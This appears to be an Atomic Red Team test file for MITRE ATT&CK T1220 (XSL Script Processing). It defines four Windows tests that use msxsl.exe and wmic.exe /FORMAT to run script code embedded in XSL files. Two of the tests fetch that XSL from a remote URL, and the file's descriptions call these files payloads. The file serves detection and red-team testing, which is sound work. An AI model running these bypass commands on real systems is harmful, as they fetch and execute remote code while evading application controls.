Michael Haag
d91f2c1479
* T1220 Fix T1220 fix per #467 * Generate docs from job=validate_atomics_generate_docs branch=T1220
81 lines
2.9 KiB
YAML
81 lines
2.9 KiB
YAML
---
|
|
attack_technique: T1220
|
|
display_name: XSL Script Processing
|
|
|
|
atomic_tests:
|
|
- name: MSXSL Bypass using local files
|
|
description: |
|
|
Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
xmlfile:
|
|
description: Location of the test XML file on the local filesystem.
|
|
type: Path
|
|
default: C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml
|
|
xslfile:
|
|
description: Location of the test XSL script file on the local filesystem.
|
|
type: Path
|
|
default: C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
- name: MSXSL Bypass using remote files
|
|
description: |
|
|
Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
xmlfile:
|
|
description: Remote location (URL) of the test XML file.
|
|
type: Url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml
|
|
xslfile:
|
|
description: Remote location (URL) of the test XSL script file.
|
|
type: Url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
|
|
|
|
- name: WMIC bypass using local XSL file
|
|
description: |
|
|
Executes the code specified within a XSL script using a local payload.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
wmic_command:
|
|
description: WMI command to execute using wmic.exe
|
|
type: string
|
|
default: process list
|
|
local_xsl_file:
|
|
description: Location of the test XSL script file on the local filesystem.
|
|
type: path
|
|
default: C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
|
|
|
|
- name: WMIC bypass using remote XSL file
|
|
description: |
|
|
Executes the code specified within a XSL script using a remote payload.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
wmic_command:
|
|
description: WMI command to execute using wmic.exe
|
|
type: string
|
|
default: process list
|
|
remote_xsl_file:
|
|
description: Remote location of an XSL payload.
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
|